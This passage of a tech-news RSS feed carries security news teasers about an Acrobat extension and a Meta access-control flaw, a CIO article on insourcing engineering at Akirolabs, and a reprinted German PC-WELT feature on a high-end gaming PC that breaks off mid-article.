<content:encoded><![CDATA[The Adobe Acrobat extension for Chrome could be used to access conversations and data rendered in WhatsApp Web without any form of authentication. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Meta IDOR Flaw Let Attackers Access Customer Support Cases]]></title>
<description><![CDATA[A critical broken access control vulnerability in Meta’s customer support infrastructure allowed attackers to read private support emails, chats, and case data belonging to other users, and even manipulate support workflows on their behalf. Independent researcher Rony K Roy discovered the flaw, w...]]></description>
<link>https://tsecurity.de/de/3686259/it-security-nachrichten/critical-meta-idor-flaw-let-attackers-access-customer-support-cases/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686259/it-security-nachrichten/critical-meta-idor-flaw-let-attackers-access-customer-support-cases/</guid>
<pubDate>Wed, 22 Jul 2026 14:24:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical broken access control vulnerability in Meta’s customer support infrastructure allowed attackers to read private support emails, chats, and case data belonging to other users, and even manipulate support workflows on their behalf. Independent researcher Rony K Roy discovered the flaw, which Meta patched by April 2026 after awarding a 78,000 USD bounty for […]</p>
<p>The post <a href="https://cyberpress.org/critical-meta-idor-flaw/">Critical Meta IDOR Flaw Let Attackers Access Customer Support Cases</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to use themes in Google Messages so you never send the wrong person the wrong text again]]></title>
<description><![CDATA[With dozens of chats on the go, you've probably had an occasion where you've sent the wrong response to the wrong person. I've found a way to avoid this problem.]]></description>
<link>https://tsecurity.de/de/3686194/it-security-nachrichten/how-to-use-themes-in-google-messages-so-you-never-send-the-wrong-person-the-wrong-text-again/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686194/it-security-nachrichten/how-to-use-themes-in-google-messages-so-you-never-send-the-wrong-person-the-wrong-text-again/</guid>
<pubDate>Wed, 22 Jul 2026 13:58:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[With dozens of chats on the go, you've probably had an occasion where you've sent the wrong response to the wrong person. I've found a way to avoid this problem.]]></content:encoded>
</item>
<item>
<title><![CDATA[From outsourcing to ownership: How we brought development in-house without breaking delivery]]></title>
<description><![CDATA[Outsourcing worked – until it didn’t.



After Akirolabs achieved early market validation and onboarded its first enterprise customers, outsourcing began to create strategic limitations around scalability, intellectual property (IP) ownership, security and delivery execution.



The challenges st...]]></description>
<link>https://tsecurity.de/de/3685759/it-security-nachrichten/from-outsourcing-to-ownership-how-we-brought-development-in-house-without-breaking-delivery/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685759/it-security-nachrichten/from-outsourcing-to-ownership-how-we-brought-development-in-house-without-breaking-delivery/</guid>
<pubDate>Wed, 22 Jul 2026 11:11:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Outsourcing worked – until it didn’t.</p>



<p class="wp-block-paragraph">After Akirolabs achieved early market validation and onboarded its first enterprise customers, outsourcing began to create strategic limitations around scalability, intellectual property (IP) ownership, security and delivery execution.</p>



<p class="wp-block-paragraph">The challenges started after the first enterprise customers confirmed product-market fit. At that point, delivery speed became directly tied to business growth. Product quality expectations increased. Infrastructure and security requirements became stricter. Investors started asking difficult but<a href="https://www.cio.com/article/4069909/10-outsourcing-strategy-questions-every-it-leader-must-answer.html"> </a><a href="https://www.cio.com/article/4069909/10-outsourcing-strategy-questions-every-it-leader-must-answer.html">fair questions</a> about IP ownership, operational dependencies and long-term scalability.</p>



<p class="wp-block-paragraph">Most importantly, engineering execution was no longer just an operational function – it became part of the company’s strategic advantage. That was the moment when the founders decided the company needed dedicated technology leadership to address these challenges. This is how I joined the company at the beginning of 2023. As VP of Engineering and a bit later as CTO, I led the transformation (usually known as<a href="https://www.cio.com/article/272355/outsourcing-outsourcing-definition-and-solutions.html"> </a><a href="https://www.cio.com/article/272355/outsourcing-outsourcing-definition-and-solutions.html">insourcing, repatriating or backsourcing</a>) from an outsourced model to an internal engineering organization while maintaining product delivery continuity and preparing the company for the next growth stage. The process took roughly a year and involved not only technical migration, but also organizational design, hiring, process development, infrastructure modernization and cultural transformation – everything from the ground up.</p>



<h2 class="wp-block-heading">Building an internal engineering organization while still delivering</h2>



<p class="wp-block-paragraph">One of the biggest misconceptions about insourcing is that it is primarily a technical project. It is a leadership and execution challenge.</p>



<p class="wp-block-paragraph">When I joined the company, there was effectively no internal engineering structure, limited visibility into the existing system and no clear long-term technical strategy. My first months were dedicated to understanding reality and I began with a comprehensive assessment of the codebase, operational risks, documentation quality and knowledge dependencies to determine the most viable transition strategy.</p>



<p class="wp-block-paragraph">Very early in the process, I faced a critical strategic decision: whether to gradually assume ownership of the existing platform or rebuild it internally. To make that decision, I evaluated four distinct transition models ranging from limited management insourcing to a complete internal rebuild.</p>



<p class="wp-block-paragraph">After assessing the technical, operational and long-term business implications of each approach, I selected the most demanding option: rebuilding the product internally while maintaining uninterrupted delivery for existing customers. Although riskier in the short term, a full rebuild offered the clearest route to complete IP ownership, architectural flexibility and long-term scalability.</p>



<p class="wp-block-paragraph">At the time, this decision ran counter to the approach typically taken by startups in similar situations. Most organizations gradually assume ownership of an existing codebase to minimize short-term risk and preserve delivery capacity. My assessment was that the accumulated architectural debt, fragmented knowledge distribution and long-term maintenance risks would ultimately make a phased takeover more expensive and less scalable than a controlled rebuild. The strategy required significantly higher execution discipline, but it allowed us to establish complete ownership of the platform, eliminate inherited constraints and create an architecture capable of supporting enterprise-scale growth.</p>



<p class="wp-block-paragraph">The next challenge was hiring.</p>



<p class="wp-block-paragraph">In Germany, hiring can easily take four to six months – mostly due to a typical 3-month notice period, which is incompatible with startup timelines. We solved this by building a hybrid organization structure early: a lean internal core team combined with carefully selected contractors. Instead of hiring only narrow specialists, we prioritized experienced generalists capable of operating across architecture, infrastructure, security and compliance discussions. Later, we evolved toward a<a href="https://docs.google.com/document/d/1uSc1o6hdJ5AweCsjcLzo3JAzvq1q-7ALl1MPMNWx2sQ/edit?usp=sharing"> </a><a href="https://docs.google.com/document/d/1uSc1o6hdJ5AweCsjcLzo3JAzvq1q-7ALl1MPMNWx2sQ/edit?usp=sharing">product engineering model</a>, where engineers owned broader product outcomes rather than narrowly defined technical functions.</p>



<p class="wp-block-paragraph">During the first three months, we established a core engineering team of four senior engineers. Over the following nine months, the organization expanded to roughly fifteen engineers while I strategically designed and executed the transformation of the platform’s architecture to meet the rigorous deployment and compliance standards of our first enterprise clients, including Raiffeisen Bank International and Bertelsmann. This structural overhaul allowed the company to meet the deployment, security and compliance requirements of enterprise customers that had previously been inaccessible under the outsourced model. At that point, we had already achieved complete coverage across backend, frontend, DevOps, QA and security.</p>



<p class="wp-block-paragraph">I also intentionally kept processes lightweight during the transition. Instead of introducing heavyweight frameworks, we focused on clarity of priorities, fast decision-making and execution discipline. We used Kanban over Scrum, eliminated unnecessary meetings, shortened the remaining ones and emphasized engineering culture over process overhead.</p>



<p class="wp-block-paragraph">Another major challenge was project estimation. Because dual-track development was unavoidable until the in-house platform reached production readiness, estimation accuracy had a direct impact on budget efficiency. Despite all challenges, my initial estimate ultimately proved remarkably close to the final delivery date, differing by only about a week. Accurate forecasting under conditions of parallel development streams, ongoing customer commitments and active team formation became a critical leadership challenge. Maintaining this level of predictability throughout the transition helped align engineering execution with business planning, hiring decisions and investor expectations.</p>



<p class="wp-block-paragraph">The engineering transformation enabled capabilities that contributed to Akirolabs being recognized as an IDC Innovator in Procurement in 2023, named amongst the Top 27 AI Startups in Germany in 2024, Sifted’s 100 Fastest-Growing Startups in DACH &amp; CEE 2025 and inclusion in 2024-2026 in ProcureTech100 annual recognition of procurement technology providers shaping the future of digital procurement.</p>



<h2 class="wp-block-heading">Managing risk without slowing down the business</h2>



<p class="wp-block-paragraph">The hardest part of insourcing is not writing code, selecting the technology stack, designing architecture or configuring infrastructure. It is avoiding disruption while the company is changing underneath the product. I successfully orchestrated the concurrent overhaul of product architecture, cross-functional engineering recruitment, infrastructure modernization and live customer operations under exceptionally tight margins.</p>



<p class="wp-block-paragraph">To reduce delivery risk, we approached the transition in layers.</p>



<p class="wp-block-paragraph">First, we focused on<a href="https://platformengineering.com/features/the-platform-centric-shift-why-enterprise-ai-teams-need-internal-ai-platforms-not-more-engineers/"> </a><a href="https://platformengineering.com/features/the-platform-centric-shift-why-enterprise-ai-teams-need-internal-ai-platforms-not-more-engineers/">infrastructure reliability and operational readiness</a> before feature expansion. Cloud architecture, recovery testing, permission segregation and incident management processes were implemented early, not after launch. We also introduced multiple testing stages and dedicated QA functions after learning the hard way that a “developers-only” quality control approach does not scale for complex web platforms and business domains.</p>



<p class="wp-block-paragraph">Second, we established a structured knowledge-transfer process to rapidly onboard engineers and reduce external dependencies.</p>



<p class="wp-block-paragraph">Third, we became extremely disciplined about scope management. One of the most common reasons<a href="https://www.cio.com/article/244453/whether-outsourcing-or-insourcing-cios-need-control.html"> </a><a href="https://www.cio.com/article/244453/whether-outsourcing-or-insourcing-cios-need-control.html">insourcing initiatives fail is uncontrolled change</a> during the rebuild phase. Every new feature request increases uncertainty non-linearly. We learned to separate strategic improvements from distractions and protect the core delivery roadmap aggressively. Throughout the transition, we successfully maintained uninterrupted customer operations by utilizing planned maintenance windows, achieved a near-zero-downtime migration and permanently doubled product velocity immediately following the migration.</p>



<p class="wp-block-paragraph">Beyond the technical migration itself, the transition established a repeatable operating model for scaling technology organizations beyond the product-market-fit stage. The framework combined organizational redesign, controlled knowledge repatriation, architecture modernization and enterprise-grade operational practices while maintaining uninterrupted customer delivery throughout the transformation. While the implementation was specific to Akirolabs, the underlying principles are broadly applicable to organizations seeking to transition from outsourced development to internal product ownership without disrupting business operations.</p>



<p class="wp-block-paragraph">By the time the new platform reached production readiness, I had established not only a functioning engineering organization, but also a stable operational model: internal ownership, production-grade infrastructure, security processes, scalable hiring practices and clear technology and product roadmaps.</p>



<p class="wp-block-paragraph">A positive side effect of the transition was the creation of internal UI/UX and Data Science capabilities, which later became strategically important for AI product initiatives and created a foundation for the third version of the product, which we released in mid-2025.</p>



<p class="wp-block-paragraph">My technical restructuring and migration to a secure proprietary platform reduced architectural risk, established full in-house ownership and helped strengthen investor confidence during the company’s successful €5M fundraising round in 2024.</p>



<p class="wp-block-paragraph">The transition created a stronger foundation for scale and supported the company’s continued expansion among enterprise organizations operating at Fortune 500 scale, including Ahold Delhaize, Workday, IFF, Deutsche Bahn and others.</p>



<h2 class="wp-block-heading">Lessons learned for CTOs considering insourcing</h2>



<p class="wp-block-paragraph">Looking back, several decisions made the transition successful, and several mistakes made it harder than necessary.</p>



<p class="wp-block-paragraph">The first lesson is simple: decisiveness in strategic transition is paramount to maintaining business momentum. Rapidly evaluating insourcing frameworks and defining clear boundaries with the external partner allowed us to mitigate operational downtime and execute a highly efficient migration ahead of critical market deadlines.</p>



<p class="wp-block-paragraph">Second, hire more senior people and do it as early as possible. Strong technical leaders multiply execution capacity far beyond their individual contribution. In our case, the quality of the first hires influenced architecture quality, hiring standards, delivery discipline and engineering culture for the entire organization.</p>



<p class="wp-block-paragraph">Finally, culture matters more than frameworks. Processes can be added later. Ownership mentality cannot.</p>



<p class="wp-block-paragraph">The biggest long-term advantage of bringing development in-house was not simply faster execution, not better code quality or operational cost optimization by over 30% after the transition which we also achieved. It was an alignment. Product strategy, engineering decisions, customer priorities and business goals became part of the same conversation instead of being separated by organizational boundaries. For technology companies operating in highly competitive markets, that alignment becomes a compounding advantage over time.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to theme Google Messages threads to better distinguish a chat]]></title>
<description><![CDATA[With dozens of chats on the go, you've probably had an occasion where you've sent the wrong response to the wrong person. I've found a way to avoid this problem.]]></description>
<link>https://tsecurity.de/de/3685705/it-nachrichten/how-to-theme-google-messages-threads-to-better-distinguish-a-chat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685705/it-nachrichten/how-to-theme-google-messages-threads-to-better-distinguish-a-chat/</guid>
<pubDate>Wed, 22 Jul 2026 10:48:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[With dozens of chats on the go, you've probably had an occasion where you've sent the wrong response to the wrong person. I've found a way to avoid this problem.]]></content:encoded>
</item>
<item>
<title><![CDATA[Vier Grafikkarten, sechs CPU-Kerne: So sah vor 14 Jahren die Höllenmaschine 4 aus]]></title>
<description><![CDATA[Hinweis: Dieser Artikel erschien im März 2007 auf pcwelt.de. Anlässlich unseres 20‑jährigen Jubiläums haben wir mittels der Wayback Machine des Internet Archive das zeitgeschichtliche Dokument restauriert. Wir haben alle Hyperlinks im Text belassen – sofern sie noch auf historische Inhalte führen...]]></description>
<link>https://tsecurity.de/de/3685665/it-nachrichten/vier-grafikkarten-sechs-cpu-kerne-so-sah-vor-14-jahren-die-hoellenmaschine-4-aus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685665/it-nachrichten/vier-grafikkarten-sechs-cpu-kerne-so-sah-vor-14-jahren-die-hoellenmaschine-4-aus/</guid>
<pubDate>Wed, 22 Jul 2026 10:34:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Hinweis: Dieser Artikel erschien im März 2007 auf pcwelt.de. Anlässlich unseres 20‑jährigen Jubiläums haben wir mittels der <a href="https://web.archive.org/" target="_blank" rel="noreferrer noopener">Wayback Machine des Internet Archive</a> das zeitgeschichtliche Dokument restauriert. Wir haben alle Hyperlinks im Text belassen – sofern sie noch auf historische Inhalte führen.</p>



<p>Hier geht es direkt zum <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">Gewinnspiel der aktuellen Höllenmaschine HMX 6 im Gesamtwert von 40.000 Euro</a>. Bestens informiert bleiben Sie mit unserem <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">HMX-6-Newsletter</a> – aber vergessen Sie nicht, die Anmeldung via E-Mail zu bestätigen. Und nun viel Spaß mit der vierten Höllenmaschine:</p>



<p>Die PC-WELT Höllenmaschine 4 repräsentiert den Stand der PC-Technik. Die beste Hard- und Software ist gerade gut genug für den ultimativen Rechnertraum. Auch die vierte Generation im Wert von 13.333 Euro können Sie wieder gewinnen.</p>



<p>Das Rückgrat des 22 Kilogramm schweren <a href="https://web.archive.org/web/20120907053335/http://www.coolermaster.de/product.php?category_id=18&amp;product_id=6767">Cooler Master Cosmos II</a> bildet eine massive Stahlkonstruktion. Zu den Besonderheiten des 300 Euro teuren Big-Towers gehören eine zentrale Lüftersteuerung, Kabelmanagement, Flügeltüren und massig Platz: Das Gehäuse besitzt allein elf Laufwerksschächte für 3,5-Zoll-Festplatten und nimmt Hauptplatinen bis zum E-ATX-Formfaktor auf.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<h2 class="wp-block-heading toc">Airbrush der Höllenmaschine 4</h2>



<p>Für das lodernde Airbrush und das seitliche Sichtfenster der Höllenmaschine 4 zeichnen sich die Casemodder Martin und Stefan Blass verantwortlich. Sein höllisch gutes Aussehen verdankt das Gehäuse den international bekannten Casemoddern Martin und Stefan Blass. Auf ihrer <a href="https://web.archive.org/web/20120707010431/http://babetech.de/">Website</a> können Sie sich von den Fähigkeiten der kunstfertigen Casemodder überzeugen. Das preisgekrönte Brüderpaar kümmert sich nicht nur um das teuflische Airbrush und bauliche Veränderungen wie das seitliche Sichtfenster, sondern zeichnet sich auch für die Innenbeleuchtung der Gehäusemodifikation verantwortlich.</p>



<p>Die Gebrüder haben für den schönen Schein einen <a href="https://web.archive.org/web/20100211155227/http://www.leds-and-more.de/catalog/product_info.php?products_id=1128">Multidimmer von Richter</a> eingebaut, der LED-Ketten im Gehäuseinnenraum und im Bodenbereich ansteuert. Über die beiliegende Fernbedienung wählen Sie zwischen acht verschiedenen Grundfarben aus, regulieren die Helligkeit und definieren individuelle Farbwechsel.</p>



<p>Bei der Asus Rampage IV Extreme paart sich eine erlesene Hauptplatinen-Ausstattung mit einem detailverliebten UEFI-Bios, das keine Wünsche offen lässt: Die Sockel-LGA2011-Hauptplatine basiert auf dem Intel-Chipsatz X79. Das UEFI-Motherboard besitzt je acht Speicherbänke, SATA- und USB-Ports sowie fünfmal 16x PCI-Express 3.0. Zur Sonderausstattung gehören CMOS-, Start- und Reset-Knopf, Diagnose-LED, Bluetooth-Unterstützung und umfassende Übertaktungsoptionen, die sich zudem in Echtzeit überwachen lassen.</p>



<h2 class="wp-block-heading toc">Prozessor: die schnellste Desktop-CPU der Welt</h2>



<p>Der <a href="https://web.archive.org/web/20130510132630/http://www.pcwelt.de/produkte/CPU-mit-Rekordtempo-Intel-Core-i7-3960X-Extreme-Edition-im-Test-3907870.html">Intel Core i7-3960X</a> ist der aktuell schnellste Desktop-Prozessor im Test. Das Intel-Flaggschiff besitzt sechs CPU-Kerne und arbeitet dank Hyperthreading als virtueller 12‑Kern‑Prozessor. Der Werkstakt liegt bei 3,3 Gigahertz, in der Höllenmaschine 4 läuft der Core i7 mit 4 GHz. Berechnungen puffert der 3960X in einem dreistufigen Cache-System: So ist die dritte Cache-Stufe, die alle Prozessorkerne dynamisch nutzen können, 15 MB mächtig. Auf die erste und zweite Cache-Stufe mit 64 beziehungsweise 256 KB darf hingegen jeder CPU-Kern exklusiv zugreifen.</p>



<p>Eine der wichtigsten exklusiven Funktionen der LGA2011-Baureihe ist der integrierte Speicher-Controller, der vier DDR3-Kanäle gleichzeitig ansteuert. Ebenfalls in der CPU verbaut sind 40 PCI-Express-3.0-Kanäle. Zur weiteren Ausstattung gehören der Schutz vor Angriffen durch einen Puffer-Überlauf (XD-Bit), zusätzliche Befehlssätze wie SSE 4.2 und das Advanced Encryption Standard Instruction Set (AES IS) sowie die Advanced Vector Extensions (AVX). Zudem unterstützt der Prozessor die Virtualisierungs-Technik Intel VT sowie 32- und 64-Bit-Betriebssysteme – so lassen sich etwa virtuelle Workstations mit unterschiedlichen Betriebssystemen einrichten.</p>



<p>Die Wasserkühlung Cooler Master Eisberg 240L Prestige gibt die CPU-Abwärme über einen Dual-Radiator an die Außenwelt ab, der zwei 120-Millimeter-Lüfter beherbergt. Das Rotationstempo der mit knapp 21 dB(A) sehr leisen Lüfter liegt bei 1600 Umdrehungen pro Minute. Im Microchannel-Kühlblock arbeitet deutsche Pumpentechnik, die bis zu 400 Liter pro Stunde durch das Kühlsystem schleudert und für mindestens 50 000 Betriebsstunden ausgelegt ist. Der keramikbeschichtete Pumpenantrieb dreht sich mit bis zu 3600 Rotationen pro Minute.</p>



<h2 class="wp-block-heading toc">Grafik: 2x ASUS GTX690-4GD5 im Quad-SLI</h2>



<p>Um die Grafikdarstellung kümmert sich in der Höllenmaschine 4 die derzeit leistungsfähigste Grafikkarte der Welt, die <a href="https://web.archive.org/web/20121015164916/http://www.asus.com/Graphics_Cards/NVIDIA_Series/GTX6904GD5/">ASUS GTX690-4GD5</a>. Kostenpunkt: knapp 1000 Euro pro Stück. Die Karte beherbergt mit der <a href="https://web.archive.org/web/20121006082219/http://www.pcwelt.de/produkte/Grafikkarte-Nvidia-Geforce-GTX-690-im-Test-5780074.html">Nvidia Geforce GTX 690</a> gleich zwei 915 Megahertz schnelle Grafikprozessoren, die gemeinsam die 3D-Berechnung übernehmen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a60804a22aec"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/ASUS-GTX690-4GD5-im-Quad-SLI.jpg?quality=50&amp;strip=all" alt="2x ASUS GTX690-4GD5 im Quad-SLI in der Höllenmaschine 4" class="wp-image-3188925" width="900" height="608" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Quad-SLI in der Höllenmaschine 4 mit zwei ASUS GTX690-4GD5</figcaption></figure><p class="imageCredit">PC-WELT</p></div>



<p>In der Höllenmaschine 4 sind gleich zwei der Asus-Doppeldecker, die über eine SLI-Brücke (Scalable Link Interface) verbunden sind. So arbeiten insgesamt vier Grafikprozessoren parallel im Quad-SLI-Modus. In der Summe stehen damit die Rechen-Power von 6144 Shader- und 512 Textur-Einheiten sowie 128 Rasteroperatoren bereit. Dabei kann der Karten-Verbund auf 4 Gigabyte GDDR5-Videospeicher zugreifen, der mit einem effektiven Datentakt von 6000 MHz arbeitet. Jede Grafikkarte besitzt mit einem Mini-Displayport und dreimal DVI vier digitale Ausgänge.</p>



<h2 class="wp-block-heading toc">Ausstattung der Höllenmaschine 4 im Überblick</h2>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><th>Komponente</th><th>Modell</th><th>Preis (Euro) <strong>am 31.8.2012</strong></th></tr><tr><td>Gehäuse</td><td>Casemod auf Basis des Cooler Master Cosmos II</td><td>1413</td></tr><tr><td>Hauptplatine</td><td>Asus Rampage IV Extreme, Intel X79, LGA2011</td><td>350</td></tr><tr><td>Prozessor</td><td>Intel Core i7-3960X, 3,30 GHz, 6 Kerne, 12 Theads</td><td>900</td></tr><tr><td>CPU-Kühlung</td><td>Cooler Master Eisberg 240L Prestige</td><td>180</td></tr><tr><td>Arbeitsspeicher</td><td>8 x 8 GB Adata XPG X Series PC3-17066U</td><td>880</td></tr><tr><td>Grafikkarte</td><td>2 x Asus GTX690-4GD5, Nvidia Geforce GTX 690</td><td>2000</td></tr><tr><td>Bildschirme</td><td>3 x ASUS VG278H, 27 Zoll, 3D-LED-LCD,</td><td>1550</td></tr><tr><td>SSD (System)</td><td>OCZ RevoDrive 3 X2 480GB, PCI-Express, 4fach Raid-0</td><td>650</td></tr><tr><td>Festplatten (Daten intern)</td><td>4 x Western Digital VelociRaptor 1000GB, Raid-5</td><td>1000</td></tr><tr><td>Festplatten (Daten extern)</td><td>2 x Western Digital Caviar Green 3000GB</td><td>300</td></tr><tr><td>Blu-ray-Brenner</td><td>Asus BW-12B1ST, SATA</td><td>100</td></tr><tr><td>Netzteil</td><td>Cooler Master Silent Pro Hybrid 1300W</td><td>250</td></tr><tr><td>Eingabegerät</td><td>Logitech G9x Laser Mouse und G19 Gaming Keyboard</td><td>200</td></tr><tr><td>Lautsprecher-Set</td><td>Logitech Z906, 5.1 System</td><td>250</td></tr><tr><td>Headset</td><td>Logitech G930 Wireless Gaming Headset</td><td>150</td></tr><tr><td>Betriebssystem</td><td>Microsoft Windows 7 Ultimate 64 Bit</td><td>160</td></tr><tr><td>Multimedia-Paket</td><td>Adobe Creative Suite 6 Design &amp; Web Premium</td><td>2000</td></tr><tr><td>Spiele-Paket</td><td>18 Top-Titel</td><td>600</td></tr><tr><td>Office-Paket</td><td>Microsoft Office Professional 2010</td><td>400</td></tr></tbody></table></figure>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a60804a2346d"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/pc-welt-hoellenmaschine-4-von-links-mit-offener-fluegeltuer.jpg?quality=50&amp;strip=all" alt="Höllenmaschine 4 mit geöffneter Flügeltür" class="wp-image-3188918" width="1024" height="768" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">PC-WELT</p></div>



<h2 class="wp-block-heading toc">Monitore: PC-Spiele in 3D auf 3 Panels gleichzeitig</h2>



<p>Der Höllenmaschine 4 stellen wir den 27-Zoll-Bildschirm <a href="https://web.archive.org/web/20120620023231if_/http://www.asus.de/Display/LCD_Monitors/VG278H">ASUS VG278H</a> zur Seite. Die physikalische Auflösung des 120-Hertz-Monitors beträgt 1920 x1080 Pixel, die Reaktionszeit 2 Millisekunden. Die LED-Hintergrundbeleuchtung erzielt eine Helligkeit von 300 cd/m2 und unterstützt die Lightboost-Technik und damit natürlich auch <a href="https://web.archive.org/web/20120905172245/http://www.pcwelt.de/produkte/Test-Nvidia-3D-Vision-2-4158397.html">Nvidia 3D Vision 2</a> – eine Technologie, die das Spielen in der dritten Dimension möglich macht. Im Lieferumfang des Asus-LCDs ist das “Nvidia 3D Vision”-Set aus Infrarot-Sender (integriert im Bildschirmrahmen) und Shutter-Brille enthalten. Der VG278H bietet mit DVI, HDMI und D-Sub drei Videoeingänge sowie einen Kopfhöreranschluss.</p>



<p>Ein großer 27-Zoll-Monitor ist gut, doch drei ASUS VG278H sind besser. Die gebündelte Auflösung des Bildschirm-Trios von 5760 x 1080 Pixeln erlaubt einen Desktop, auf dem sich bequem arbeiten lässt: Da kann man zahlreiche Fenster in ihrer vollen Größe geöffnet lassen, und behält dennoch den Überblick. Interessant ist diese große Arbeitsumgebung auch für Grafiker und Video-Bearbeiter, die dadurch gleich mehrere Projekte am Laufen halten, ohne eines schließen zu müssen.</p>



<p>Ernsthaften PC-Spielern kann dagegen die Bildschirmgröße nicht groß genug sein – denn sie bedeutet größere Übersicht und ein realistischeres Spielerlebnis. So füllt etwa die wunderschöne Landschaft in Skyrim die volle Breite der drei Monitore aus und wirkt dadurch schon fast wie ein echter Horizont, der Lust auf das Erkunden macht. Dank der brachialen Leistung der Höllenmaschine 4 und <a href="https://web.archive.org/web/20120825211507/http://www.nvidia.de/object/3d-vision-surround-requirements-de.html">Nvidia 3D Vision Surround</a> geht das auch flüssig in stereoskopischem 3D.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<h2 class="wp-block-heading toc">Arbeitsspeicher: Quad-Channel mit 64 Gigabyte</h2>



<p>Speicher kann man nie genug haben! Die acht Module Adata XPG X Series PC3-17066U mit jeweils 8 Gigabyte Kapazität steuert der Controller in der Intel-CPU im Vierkanal-Modus an. Die Module laufen mit 10-11-11-30er-Zugriffszeiten. Der mit dem Extreme Memory Profile (XMP) effektiv 2133 Megahertz schnelle Arbeitsspeicher beschert der Höllenmaschine 4 eine Speicherbandbreite von über 45 Gigabyte pro Sekunde. Da macht Virtualisierung so richtig Spaß.</p>



<h2 class="wp-block-heading toc">PCI-Express-SSD, 4 WD VelociRaptor und 4 WD Caviar Green </h2>



<p>Das Betriebssystem und alle Programme dürfen auf der Solid State Drive OCZ RevoDrive 3 X2 480GB Platz nehmen. Die Flashspeicher-Festplatte arbeitet mit vier Sandforce-SF-2281-Controllern intern als Raid-0-Verbund. Dadurch erreicht die SSD eine Datentransferrate von in der Spitze fast 1400 Megabyte pro Sekunde und einen Befehlsdurchsatz von bis zu 230.000 IOPS beim zufälligen Schreiben von 4-KB-Blöcken. Eine herkömmliche SATA-Schnittstelle würde das OCZ-Modell ausbremsen, deswegen setzt das RevoDrive auf einen PCI-Express-Anschluss.</p>


